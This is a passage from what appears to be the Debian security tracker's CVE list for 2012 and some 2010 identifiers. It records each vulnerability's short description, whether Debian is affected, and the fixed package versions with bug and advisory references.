	NOT-FOR-US: VMware
CVE-2012-2449 (VMware Workstation 8.x before 8.0.3, VMware Player 4.x before 4.0.3, ...)
	NOT-FOR-US: VMware
CVE-2012-2448 (VMware ESXi 3.5 through 5.0 and ESX 3.5 through 4.1 allow remote ...)
	NOT-FOR-US: VMware
CVE-2012-2447 (Cross-site request forgery (CSRF) vulnerability in ...)
	NOT-FOR-US: Netsweeper WebAdmin Portal
CVE-2012-2446 (Cross-site scripting (XSS) vulnerability in tools/local_lookup.php in ...)
	NOT-FOR-US: Netsweeper WebAdmin Portal
CVE-2012-2451 (The Config::IniFiles module before 2.71 for Perl creates temporary ...)
	- libconfig-inifiles-perl 2.72-1 (bug #671255; low)
	[squeeze] - libconfig-inifiles-perl 2.52-1+squeeze1
	NOTE: https://bitbucket.org/shlomif/perl-config-inifiles/changeset/a08fa26f4f59
	NOTE: http://seclists.org/oss-sec/2012/q2/225
CVE-2012-2445
	RESERVED
CVE-2012-2444
	RESERVED
CVE-2012-2443
	RESERVED
CVE-2012-2442 (Buffer overflow in the Video Manager in Nokia PC Suite 7.1.180.64 and ...)
	NOT-FOR-US: Nokia PC Suite
CVE-2012-2441 (RuggedCom Rugged Operating System (ROS) before 3.3 has a factory ...)
	NOT-FOR-US: RuggedCom Rugged Operating System
CVE-2012-2440 (The default configuration of the TP-Link 8840T router enables ...)
	NOT-FOR-US: TP-Link router
CVE-2012-2439 (The default configuration of the NETGEAR ProSafe FVS318N firewall ...)
	NOT-FOR-US: NETGEAR appliance
CVE-2012-2438 (ar web content manager (AWCM) 2.2 does not restrict the number of ...)
	NOT-FOR-US: ar web content manager
CVE-2012-2437 (cookie_gen.php in ar web content manager (AWCM) 2.2 does not require ...)
	NOT-FOR-US: ar web content manager
CVE-2012-2436 (Multiple cross-site scripting (XSS) vulnerabilities in Pligg CMS ...)
	NOT-FOR-US: Pligg
CVE-2012-2435 (Directory traversal vulnerability in the captcha module in Pligg CMS ...)
	NOT-FOR-US: Pligg
CVE-2012-2434
	RESERVED
CVE-2012-2433
	RESERVED
CVE-2012-2432
	RESERVED
CVE-2012-2431
	RESERVED
CVE-2012-2430
	RESERVED
CVE-2012-2429 (The server in xArrow before 3.4.1 performs an invalid read operation, ...)
	NOT-FOR-US: xArrow
CVE-2012-2428 (Integer overflow in the server in xArrow before 3.4.1 allows remote ...)
	NOT-FOR-US: xArrow
CVE-2012-2427 (Heap-based buffer overflow in the server in xArrow before 3.4.1 allows ...)
	NOT-FOR-US: xArrow
CVE-2012-2426 (The server in xArrow before 3.4.1 does not properly allocate memory, ...)
	NOT-FOR-US: xArrow
CVE-2012-2425 (The intu-help-qb (aka Intuit Help System Async Pluggable Protocol) ...)
	NOT-FOR-US: Intuit
CVE-2012-2424 (The intu-help-qb (aka Intuit Help System Async Pluggable Protocol) ...)
	NOT-FOR-US: Intuit
CVE-2012-2423 (The intu-help-qb (aka Intuit Help System Async Pluggable Protocol) ...)
	NOT-FOR-US: Intuit
CVE-2012-2422 (Intuit QuickBooks 2009 through 2012 might allow remote attackers to ...)
	NOT-FOR-US: Intuit
CVE-2012-2421 (Absolute path traversal vulnerability in the intu-help-qb (aka Intuit ...)
	NOT-FOR-US: Intuit
CVE-2012-2420 (The intu-help-qb (aka Intuit Help System Async Pluggable Protocol) ...)
	NOT-FOR-US: Intuit
CVE-2012-2419 (Memory leak in the intu-help-qb (aka Intuit Help System Async ...)
	NOT-FOR-US: Intuit
CVE-2012-2418 (Heap-based buffer overflow in the intu-help-qb (aka Intuit Help System ...)
	NOT-FOR-US: Intuit
CVE-2012-2417 (PyCrypto before 2.6 does not produce appropriate prime numbers when ...)
	{DSA-2502-1}
	- python-crypto 2.6-1
	NOTE: https://bugs.launchpad.net/pycrypto/+bug/985164
CVE-2012-2413
	RESERVED
CVE-2012-2412
	RESERVED
CVE-2012-2411 (Buffer overflow in RealNetworks RealPlayer before 15.0.4.53, and ...)
	NOT-FOR-US: RealNetworks RealPlayer
CVE-2012-2410 (Buffer overflow in RealNetworks RealPlayer before 15.0.6.14, ...)
	NOT-FOR-US: RealNetworks RealPlayer
CVE-2012-2409 (Buffer overflow in RealNetworks RealPlayer before 15.0.6.14, ...)
	NOT-FOR-US: RealNetworks RealPlayer
CVE-2012-2408 (The AAC SDK in RealNetworks RealPlayer before 15.0.6.14, RealPlayer SP ...)
	NOT-FOR-US: RealNetworks RealPlayer
CVE-2012-2407 (Buffer overflow in RealNetworks RealPlayer before 15.0.6.14, ...)
	NOT-FOR-US: RealNetworks RealPlayer
CVE-2012-2406 (RealNetworks RealPlayer before 15.0.4.53, and RealPlayer SP 1.0 ...)
	NOT-FOR-US: RealPlayer
CVE-2012-2405 (Gallery 2 before 2.3.2 and 3 before 3.0.3 does not properly implement ...)
	- gallery2
CVE-2012-2404 (wp-comments-post.php in WordPress before 3.3.2 supports offsite ...)
	{DSA-2470-1}
	- wordpress 3.3.2+dfsg-1 (bug #670124)
CVE-2012-2403 (wp-includes/formatting.php in WordPress before 3.3.2 attempts to ...)
	{DSA-2470-1}
	- wordpress 3.3.2+dfsg-1 (bug #670124)
CVE-2012-2402 (wp-admin/plugins.php in WordPress before 3.3.2 allows remote ...)
	{DSA-2470-1}
	- wordpress 3.3.2+dfsg-1 (bug #670124)
CVE-2012-2401 (Plupload before 1.5.4, as used in wp-includes/js/plupload/ in ...)
	{DSA-2470-1}
	- wordpress 3.3.2+dfsg-1 (bug #670124)
CVE-2012-2400 (Unspecified vulnerability in wp-includes/js/swfobject.js in WordPress ...)
	{DSA-2470-1}
	- wordpress 3.3.2+dfsg-1 (bug #670124)
CVE-2012-2399 (Unspecified vulnerability in wp-includes/js/swfupload/swfupload.swf in ...)
	{DSA-2470-1}
	- wordpress 3.3.2+dfsg-1 (bug #670124)
CVE-2010-5136
	RESERVED
CVE-2010-5135
	RESERVED
CVE-2010-5134
	RESERVED
CVE-2010-5133
	RESERVED
CVE-2010-5132
	RESERVED
CVE-2010-5131
	RESERVED
CVE-2010-5130
	RESERVED
CVE-2010-5129
	RESERVED
CVE-2010-5128
	RESERVED
CVE-2010-5127
	RESERVED
CVE-2010-5126
	RESERVED
CVE-2010-5125
	RESERVED
CVE-2010-5124
	RESERVED
CVE-2010-5123
	RESERVED
CVE-2010-5122
	RESERVED
CVE-2010-5121
	RESERVED
CVE-2010-5120
	RESERVED
CVE-2010-5119
	RESERVED
CVE-2010-5118
	RESERVED
CVE-2010-5117
	RESERVED
CVE-2010-5116
	RESERVED
CVE-2010-5115
	RESERVED
CVE-2010-5114
	RESERVED
CVE-2010-5113
	RESERVED
CVE-2010-5112
	RESERVED
CVE-2010-5111
	RESERVED
CVE-2010-5110
	RESERVED
CVE-2010-5109 [libytnef: buffer overflow]
	RESERVED
	- libytnef (low; bug #705468)
	[squeeze] - libytnef (Minor issue)
	[wheezy] - libytnef (Minor issue)
	- claws-mail-extra-plugins (low)
	[squeeze] - claws-mail-extra-plugins (Minor issue)
	[wheezy] - claws-mail-extra-plugins (Minor issue)
CVE-2010-5108 [Trac Ticket Modification Workflow Permission Restriction Bypass]
	RESERVED
	- trac 0.11.7-1 (bug #573260)
CVE-2010-5107 (The default configuration of OpenSSH through 6.1 enforces a fixed time ...)
	- openssh 1:6.0p1-4 (low; bug #700102)
	[squeeze] - openssh 1:5.5p1-6+squeeze3
CVE-2010-5106 (The XML-RPC remote publishing interface in xmlrpc.php in WordPress ...)
	- wordpress 3.0.3-1
CVE-2010-5105 [blender /tmp/quit.blend temp file issue]
	RESERVED
	- blender (low; bug #584621)
	[squeeze] - blender (Minor issue)
	[wheezy] - blender (Minor issue)
CVE-2010-5104 (The escapeStrForLike method in TYPO3 4.2.x before 4.2.16, 4.3.x before ...)
	- typo3-src 4.3.9+dfsg1-1 (bug #607286)
CVE-2010-5103 (SQL injection vulnerability in the list module in TYPO3 4.2.x before ...)
	- typo3-src 4.3.9+dfsg1-1 (bug #607286)
CVE-2010-5102 (Directory traversal vulnerability in mod/tools/em/class.em_unzip.php ...)
	- typo3-src 4.3.9+dfsg1-1 (bug #607286)
CVE-2010-5101 (Directory traversal vulnerability in the TypoScript setup in TYPO3 ...)
	- typo3-src 4.3.9+dfsg1-1 (bug #607286)
CVE-2010-5100 (Multiple cross-site scripting (XSS) vulnerabilities in the Install ...)
	- typo3-src 4.3.9+dfsg1-1 (bug #607286)
CVE-2010-5099 (The fileDenyPattern functionality in the PHP file inclusion protection ...)
	- typo3-src 4.3.9+dfsg1-1 (bug #607286)
CVE-2010-5098 (Cross-site scripting (XSS) vulnerability in the FORM content object in ...)
	- typo3-src 4.3.9+dfsg1-1 (bug #607286)
CVE-2010-5097 (Cross-site scripting (XSS) vulnerability in the click enlarge ...)
	- typo3-src 4.3.9+dfsg1-1 (bug #607286)
CVE-2010-5096 (** DISPUTED ** ...)
	NOT-FOR-US: MyBB
CVE-2010-5095 (Cross-site scripting (XSS) vulnerability in SilverStripe 2.3.x before ...)
	- silverstripe (bug #528461)
	NOTE: http://seclists.org/oss-sec/2012/q2/209
CVE-2010-5094 (The deleteinstallfiles function in control/ContentController.php in ...)
	- silverstripe (bug #528461)
	NOTE: http://seclists.org/oss-sec/2012/q2/209
CVE-2010-5093 (Member_ProfileForm in security/Member.php in SilverStripe 2.3.x before ...)
	- silverstripe (bug #528461)
	NOTE: http://seclists.org/oss-sec/2012/q2/209
CVE-2010-5092 (The Add Member dialog in the Security admin page in SilverStripe 2.4.0 ...)
	- silverstripe (bug #528461)
	NOTE: http://seclists.org/oss-sec/2012/q2/209
CVE-2010-5091 (The setName function in filesystem/File.php in SilverStripe 2.3.x ...)
	- silverstripe (bug #528461)
	NOTE: http://seclists.org/oss-sec/2012/q2/209
CVE-2010-5090 (SilverStripe before 2.4.2 allows remote authenticated users to change ...)
	- silverstripe (bug #528461)
	NOTE: http://seclists.org/oss-sec/2012/q2/209
CVE-2010-5089 (SilverStripe before 2.4.2 does not properly restrict access to pages ...)
	- silverstripe (bug #528461)
	NOTE: http://seclists.org/oss-sec/2012/q2/209
CVE-2010-5088 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...)
	- silverstripe (bug #528461)
	NOTE: http://seclists.org/oss-sec/2012/q2/209
CVE-2010-5087 (SilverStripe 2.3.x before 2.3.10 and 2.4.x before 2.4.4 allows remote ...)
	- silverstripe (bug #528461)
	NOTE: http://seclists.org/oss-sec/2012/q2/209
CVE-2012-2416 (chan_sip.c in the SIP channel driver in Asterisk Open Source 1.8.x ...)
	- asterisk 1:1.8.11.1~dfsg-1 (bug #670180)
	[squeeze] - asterisk (Vulnerable code not present)
CVE-2012-2415 (Heap-based buffer overflow in chan_skinny.c in the Skinny channel ...)
	{DSA-2460-1}
	- asterisk 1:1.8.11.1~dfsg-1 (bug #670180)
CVE-2012-2414 (main/manager.c in the Manager Interface in Asterisk Open Source ...)
	{DSA-2460-1}
	- asterisk 1:1.8.11.1~dfsg-1 (bug #670180)
CVE-2012-2398 (Cross-site scripting (XSS) vulnerability in files/ajax/download.php in ...)
	- owncloud 3.0.3-1
CVE-2012-2397 (Cross-site request forgery (CSRF) vulnerability in ownCloud before ...)
	- owncloud 3.0.3-1
CVE-2012-2396 (VideoLAN VLC media player 2.0.1 allows remote attackers to cause a ...)
	- vlc (unimportant; bug #671727)
	- taglib 1.7.2-1 (unimportant)
CVE-2012-2395 (Incomplete blacklist vulnerability in action_power.py in Cobbler 2.2.0 ...)
	- cobbler (bug #545583)
CVE-2012-2394 (Wireshark 1.4.x before 1.4.13 and 1.6.x before 1.6.8 on the SPARC and ...)
	- wireshark 1.6.8-1 (unimportant)
	NOTE: Not suitable for code injection
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7221
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=824419
CVE-2012-2393 (epan/dissectors/packet-diameter.c in the DIAMETER dissector in ...)
	- wireshark 1.6.8-1 (unimportant)
	NOTE: Not suitable for code injection
	NOTE: http://www.wireshark.org/security/wnpa-sec-2012-09.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7133
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=824413
CVE-2012-2392 (Wireshark 1.4.x before 1.4.13 and 1.6.x before 1.6.8 allows remote ...)
	- wireshark 1.6.8-1 (unimportant)
	NOTE: Not suitable for code injection
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6805 Squeeze: vulnerable code not present
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7118 Squeeze: vulnerable code present
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7119 Squeeze: vulnerable code present
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7120 Squeeze: vulnerable code not present
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7121 Squeeze: vulnerable code present
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7122 Squeeze: vulnerable code present
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7124 Squeeze: vulnerable code not present
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7125 is CVE-2012-3825 and CVE-2012-3826
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=824411
CVE-2012-2391
	REJECTED
CVE-2012-2390 (Memory leak in mm/hugetlb.c in the Linux kernel before 3.4.2 allows ...)
	- linux 3.2.19-1 (low)
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-46
CVE-2012-2389 (hostapd 0.7.3, and possibly other versions before 1.0, uses 0644 ...)
	- hostapd (Debian package provides no default config file)
	- wpa (Debian package provides no default config file)
CVE-2012-2388 (The GMP Plugin in strongSwan 4.2.0 through 4.6.3 allows remote ...)
	{DSA-2483-1}
	- strongswan 4.5.2-1.4
CVE-2012-2387 (devotee 0.1 patch 2 uses a 32-bit seed for generating 48-bit random ...)
	- devotee (bug #470995)
CVE-2012-2386 (Integer overflow in the phar_parse_tarfile function in tar.c in the ...)
	{DSA-2492-1}
	- php5 5.4.4~rc1-1
CVE-2012-2385 (The terminal dispatcher in mosh before 1.2.1 allows remote ...)
	- mosh 1.2.1-1 (low; bug #673871)
	[squeeze] - mosh 1.2.1-1 (low; bug #673871)
	NOTE: https://github.com/keithw/mosh/issues/271
	NOTE: https://github.com/keithw/mosh/commit/9791768705528e911bfca6c4d8aa88139035060e
CVE-2012-2384 (Integer overflow in the i915_gem_do_execbuffer function in ...)
	- linux-2.6 3.2.17-1
	[squeeze] - linux-2.6 (Vulnerable code not present)
CVE-2012-2383 (Integer overflow in the i915_gem_execbuffer2 function in ...)
	- linux-2.6 3.2.17-1
	[squeeze] - linux-2.6 (Vulnerable code not present)
CVE-2012-2382
	RESERVED
CVE-2012-2381 (Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller ...)
	NOT-FOR-US: Apache Roller
CVE-2012-2380 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...)
	NOT-FOR-US: Apache Roller
CVE-2012-2379 (Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before ...)
	NOT-FOR-US: Apache CXF
CVE-2012-2378 (Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before ...)
	NOT-FOR-US: Apache CXF
CVE-2012-2377 (JGroups diagnostics service in JBoss Enterprise Portal Platform before ...)
	- jbossas4 (Only builds a few libraries, not the full application server)
CVE-2012-2376 (Buffer overflow in the com_print_typeinfo function in PHP 5.4.3 and ...)
	- php5 (Windows-specific vulnerability)
CVE-2012-2375 (The __nfs4_get_acl_uncached function in fs/nfs/nfs4proc.c in the NFSv4 ...)
	- linux-2.6 3.2.19-1
CVE-2012-2374 (CRLF injection vulnerability in the ...)
	- python-tornado 2.1.0-3 (low; bug #673987)
	[squeeze] - python-tornado (Vulnerable code not present)
CVE-2012-2373 (The Linux kernel before 3.4.5 on the x86 platform, when Physical ...)
	- linux-2.6 3.2.19-1
	[squeeze] - linux-2.6 (Vulnerable code not present)
CVE-2012-2372 (The rds_ib_xmit function in net/rds/ib_send.c in the Reliable Datagram ...)
	- linux (low)
CVE-2012-2371 (Cross-site scripting (XSS) vulnerability in index.php in the ...)
	NOT-FOR-US: WP-FaceThumb plugin for WordPress
CVE-2012-2370 (Multiple integer overflows in the read_bitmap_file_data function in ...)
	- gdk-pixbuf 2.26.1-1 (low)
CVE-2012-2369 (Format string vulnerability in the log_message_cb function in ...)
	{DSA-2476-1}
	- pidgin-otr 3.2.1-1 (medium; bug #673154)
	NOTE: libotr not affected
CVE-2012-2368 (Bytemark Symbiosis before Revision 1322 does not properly validate ...)
	NOT-FOR-US: Bytemark Symbiosis
CVE-2012-2367 (Moodle 1.9.x before 1.9.18, 2.0.x before 2.0.9, 2.1.x before 2.1.6, ...)
	- moodle 2.2.3.dfsg-1 (low; bug #674163)
	[squeeze] - moodle 1.9.9.dfsg2-2.1+squeeze4
CVE-2012-2366 (mod/data/preset.php in Moodle 2.1.x before 2.1.6 and 2.2.x before ...)
	- moodle 2.2.3.dfsg-1 (bug #674163)
	[squeeze] - moodle (Only affects 2.1 to 2.2)
CVE-2012-2365 (Cross-site scripting (XSS) vulnerability in Moodle 2.0.x before 2.0.9, ...)
	- moodle 2.2.3.dfsg-1 (bug #674163)
	[squeeze] - moodle (Only affects 2.0 to 2.2)
CVE-2012-2364 (Cross-site scripting (XSS) vulnerability in lib/filelib.php in Moodle ...)
	- moodle 2.2.3.dfsg-1 (bug #674163)
	[squeeze] - moodle (Only affects 2.0 to 2.2)
CVE-2012-2363 (SQL injection vulnerability in calendar/event.php in the calendar ...)
	- moodle 2.0-1 (bug #674163)
	[squeeze] - moodle 1.9.9.dfsg2-2.1+squeeze4
	NOTE: Only affects Moodle 1.9.x
CVE-2012-2362 (Cross-site scripting (XSS) vulnerability in blog/lib.php in the blog ...)
	- moodle 2.0-1 (bug #674163)
	[squeeze] - moodle 1.9.9.dfsg2-2.1+squeeze4
	NOTE: Only affects Moodle 1.9.x
CVE-2012-2361 (Cross-site scripting (XSS) vulnerability in admin/webservice/forms.php ...)
	- moodle 2.2.3.dfsg-1 (bug #674163)
	[squeeze] - moodle (Only affects 2.0 to 2.2)
CVE-2012-2360 (Cross-site scripting (XSS) vulnerability in the Wiki subsystem in ...)
	- moodle 2.2.3.dfsg-1 (bug #674163)
	[squeeze] - moodle (Only affects 2.0 to 2.2)
CVE-2012-2359 (admin/roles/override.php in Moodle 2.0.x before 2.0.9, 2.1.x before ...)
	- moodle 2.2.3.dfsg-1 (bug #674163)
	[squeeze] - moodle (Only affects 2.0 to 2.2)
CVE-2012-2358 (Moodle 2.0.x before 2.0.9, 2.1.x before 2.1.6, and 2.2.x before 2.2.3 ...)
	- moodle 2.2.3.dfsg-1 (bug #674163)
	[squeeze] - moodle (Only affects 2.0 to 2.2)
CVE-2012-2357 (The Multi-Authentication feature in the Central Authentication Service ...)
	- moodle 2.2.3.dfsg-1 (bug #674163)
	[squeeze] - moodle (Only affects 2.1 to 2.2)
CVE-2012-2356 (The question-bank functionality in Moodle 2.1.x before 2.1.6 and 2.2.x ...)
	- moodle 2.2.3.dfsg-1 (bug #674163)
	[squeeze] - moodle (Only affects 2.1 to 2.2)
CVE-2012-2355 (Moodle 2.1.x before 2.1.6 and 2.2.x before 2.2.3 allows remote ...)
	- moodle 2.2.3.dfsg-1 (bug #674163)
	[squeeze] - moodle (Only affects 2.1 to 2.2)
CVE-2012-2354 (Moodle 2.1.x before 2.1.6 and 2.2.x before 2.2.3 allows remote ...)
	- moodle 2.2.3.dfsg-1 (bug #674163)
	[squeeze] - moodle (Only affects 2.1 to 2.2)
CVE-2012-2353 (Moodle 2.1.x before 2.1.6 and 2.2.x before 2.2.3 allows remote ...)
	- moodle 2.2.3.dfsg-1 (bug #674163)
	[squeeze] - moodle (Only affects 2.1 to 2.2)
CVE-2012-2352 (The archive management (arc_manage) page in wwsympa/wwsympa.fcgi.in in ...)
	{DSA-2477-1}
	- sympa 6.1.11~dfsg-1 (bug #672893; high)
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/12/8
CVE-2012-2351 (The default configuration of the auth/saml plugin in Mahara before ...)
	{DSA-2467-1}
	- mahara 1.4.2-1
CVE-2012-2350 [pam_shield default configuration does not take any action]
	RESERVED
	- pam-shield 0.9.2-3.3 (low; bug #658830)
	[squeeze] - pam-shield 0.9.2-3.3~squeeze1
CVE-2012-2349
	REJECTED
CVE-2012-2348
	REJECTED
CVE-2012-2347
	REJECTED
CVE-2012-2346
	REJECTED
CVE-2012-2345
	REJECTED
CVE-2012-2344
	REJECTED
CVE-2012-2343
	REJECTED
CVE-2012-2342
	REJECTED
CVE-2012-2341 (Cross-site request forgery (CSRF) vulnerability in the Take Control ...)
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/10/6
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/11/2
	NOT-FOR-US: Drupal Take Control
CVE-2012-2340 (The Contact Forms module 7.x-1.x before 7.x-1.2 for Drupal does not ...)
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/10/6
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/11/2
	NOT-FOR-US: Drupal Contact Forms
CVE-2012-2339 (Cross-site scripting (XSS) vulnerability in the Glossary module ...)
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/10/6
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/11/2
	NOT-FOR-US: Drupal Glossary
CVE-2012-2338 (SQL injection vulnerability in includes/picture.class.php in Galette ...)
	NOT-FOR-US: Galette
	NOTE: http://redmine.ulysses.fr/issues/250
	NOTE: http://redmine.ulysses.fr/projects/galette/repository/revisions/8c13ec159ba
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/10/5
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/11/1
CVE-2012-2337 (sudo 1.6.x and 1.7.x before 1.7.9p1, and 1.8.x before 1.8.4p5, does ...)
	{DSA-2478-1}
	- sudo 1.8.3p2-1.1 (bug #673766)
CVE-2012-2336 (sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when ...)
	- php5 5.4.3 (unimportant)
	NOTE: Rather harmless bug
CVE-2012-2335 (php-wrapper.fcgi does not properly handle command-line arguments, ...)
	NOT-FOR-US: Incomplete wrapper provided by PHP as workaround for CVE-2012-1823/CVE-2012-2311
CVE-2012-2334 (Integer overflow in filter/source/msfilter/msdffimp.cxx in ...)
	{DSA-2487-1}
	- libreoffice 1:3.5.2~rc2-1
	- openoffice.org 1:3.3.0-1
	NOTE: Since 3.3.0 openoffice.org is a transitional source package
CVE-2012-2333 (Integer underflow in OpenSSL before 0.9.8x, 1.0.0 before 1.0.0j, and ...)
	{DSA-2475-1}
	- openssl 1.0.1c-1 (bug #672452)
	NOTE: http://seclists.org/oss-sec/2012/q2/299
	NOTE: http://www.openssl.org/news/secadv_20120510.txt
CVE-2012-2332 (SQL injection vulnerability in serendipity/serendipity_admin.php in ...)
	- serendipity (bug #671937; medium)
	NOTE: http://www.koramis.com/advisories/2012/KORAMIS-ADV2012-001.txt
	NOTE: http://blog.s9y.org/archives/240-Serendipity-1.6.1-released.html
	NOTE: CVE id requested http://seclists.org/oss-sec/2012/q2/276
CVE-2012-2331 (Cross-site scripting (XSS) vulnerability in ...)
	- serendipity (bug #671937; medium)
	NOTE: http://www.koramis.com/advisories/2012/KORAMIS-ADV2012-001.txt
	NOTE: http://blog.s9y.org/archives/240-Serendipity-1.6.1-released.html
	NOTE: CVE id requested http://seclists.org/oss-sec/2012/q2/276
CVE-2012-2330 (The Update method in src/node_http_parser.cc in Node.js before 0.6.17 ...)
	- nodejs 0.6.17~dfsg1-1
	NOTE: http://blog.nodejs.org/2012/05/07/http-server-security-vulnerability-please-upgrade-to-0-6-17/
	NOTE: https://github.com/joyent/node/commit/c9a231d
CVE-2012-2329 (Buffer overflow in the apache_request_headers function in ...)
	- php5 5.4.3-1
	[squeeze] - php5 (Vulnerable code not present)
	NOTE: 5.4.x only
CVE-2012-2328
	RESERVED
	NOT-FOR-US: sblim
CVE-2012-2327 (MyBB (aka MyBulletinBoard) before 1.6.7 allows remote attackers to ...)
	NOT-FOR-US: MyBB (aka MyBulletinBoard)
	NOTE: http://blog.mybb.com/2012/04/01/mybb-1-6-7-update-1-8-development/
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/07/14
CVE-2012-2326 (Cross-site scripting (XSS) vulnerability in the Admin Control Panel ...)
	NOT-FOR-US: MyBB (aka MyBulletinBoard)
	NOTE: http://blog.mybb.com/2012/04/01/mybb-1-6-7-update-1-8-development/
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/07/14
CVE-2012-2325 (SQL injection vulnerability in the User Inline Moderation feature in ...)
	NOT-FOR-US: MyBB (aka MyBulletinBoard)
	NOTE: http://blog.mybb.com/2012/04/01/mybb-1-6-7-update-1-8-development/
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/07/14
CVE-2012-2324 (Multiple SQL injection vulnerabilities in MyBB (aka MyBulletinBoard) ...)
	NOT-FOR-US: MyBB
CVE-2012-2323
	RESERVED
CVE-2012-2322 (Integer overflow in the dhcpv6_get_option function in gdhcp/client.c ...)
	- connman 1.0-1 (bug #672989)
	[squeeze] - connman (Vulnerable code not present)
CVE-2012-2321 (The loopback plug-in in ConnMan before 0.85 allows remote attackers to ...)
	- connman 1.0-1 (low; bug #672989)
	[squeeze] - connman (Minor issue)
CVE-2012-2320 (ConnMan before 0.85 does not ensure that netlink messages originate ...)
	- connman 1.0-1 (low; bug #672989)
	[squeeze] - connman (Minor issue)
CVE-2012-2319 (Multiple buffer overflows in the hfsplus filesystem implementation in ...)
	- linux 3.2.17-1 (low)
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-46
CVE-2012-2318 (msg.c in the MSN protocol plugin in libpurple in Pidgin before 2.10.4 ...)
	- pidgin 2.10.4-1
CVE-2012-2317 (The Debian php_crypt_revamped.patch patch for PHP 5.3.x, as used in ...)
	- php5 5.3.6-1 (bug #581170)
	[squeeze] - php5 5.3.3-7+squeeze4
CVE-2012-2316 (Cross-site request forgery (CSRF) vulnerability in ...)
	NOT-FOR-US: OpenKM
CVE-2012-2315 (admin/Auth in OpenKM 5.1.7 and other versions before 5.1.8-2 does not ...)
	NOT-FOR-US: OpenKM
CVE-2012-2314 (The bootloader configuration module (pyanaconda/bootloader.py) in ...)
	NOT-FOR-US: The anaconda installer
CVE-2012-2313 (The rio_ioctl function in drivers/net/ethernet/dlink/dl2k.c in the ...)
	- linux 3.2.19-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-46
CVE-2012-2312
	RESERVED
	- jbossas4 (Only affects JBoss 7)
CVE-2012-2311 (sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when ...)
	{DSA-2465-1}
	- php5 5.4.3-1 (bug #671880)
	NOTE: This CVE ID is for the initial incomplete fix for CVE-2012-1823
	NOTE: http://www.kb.cert.org/vuls/id/520827
	NOTE: http://osvdb.org/show/osvdb/81633
CVE-2012-2310 (Cross-site scripting (XSS) vulnerability in the cctags module for ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2309 (Cross-site scripting (XSS) vulnerability in the Glossify Internal ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2308 (Cross-site scripting (XSS) vulnerability in the Taxonomy Grid : ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2307 (Cross-site request forgery (CSRF) vulnerability in the Addressbook ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2306 (SQL injection vulnerability in the Addressbook module for Drupal ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2305 (Cross-site request forgery (CSRF) vulnerability in the Node Gallery ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2304 (The Linkit module 7.x-2.x before 7.x-2.3 for Drupal, when using an ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2303 (The Spaces module 6.x-3.x before 6.x-3.4 for Drupal does not enforce ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2302 (Site Documentation (Sitedoc) module for Drupal 6.x-1.x before 6.x-1.4 ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2301 [Drupal SA-CONTRIB-2012-064 - Ubercart - Arbitrary PHP Execution]
	RESERVED
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2300 (Multiple cross-site scripting (XSS) vulnerabilities in the Ubercart ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2299 (The Ubercart module 6.x-2.x before 6.x-2.8 and 7.x-3.x before 7.x-3.1 ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2298 (Multiple cross-site scripting (XSS) vulnerabilities in the RealName ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2297 (Multiple cross-site scripting (XSS) vulnerabilities in the Creative ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2296 (The Janrain Engage (formerly RPX) module for Drupal 6.x-1.x. 6.x-2.x ...)
	NOT-FOR-US: Drupal addon not packaged
CVE-2012-2295
	RESERVED
CVE-2012-2294 (EMC RSA Archer SmartSuite Framework 4.x and RSA Archer GRC 5.x before ...)
	NOT-FOR-US: EMC RSA Archer
CVE-2012-2293 (Directory traversal vulnerability in EMC RSA Archer SmartSuite ...)
	NOT-FOR-US: EMC RSA Archer
CVE-2012-2292 (The Silverlight cross-domain policy in EMC RSA Archer SmartSuite ...)
	NOT-FOR-US: EMC RSA Archer
CVE-2012-2291 (EMC Avamar Client 4.x, 5.x, and 6.x on HP-UX and Mac OS X, and the EMC ...)
	NOT-FOR-US: EMC Avamar
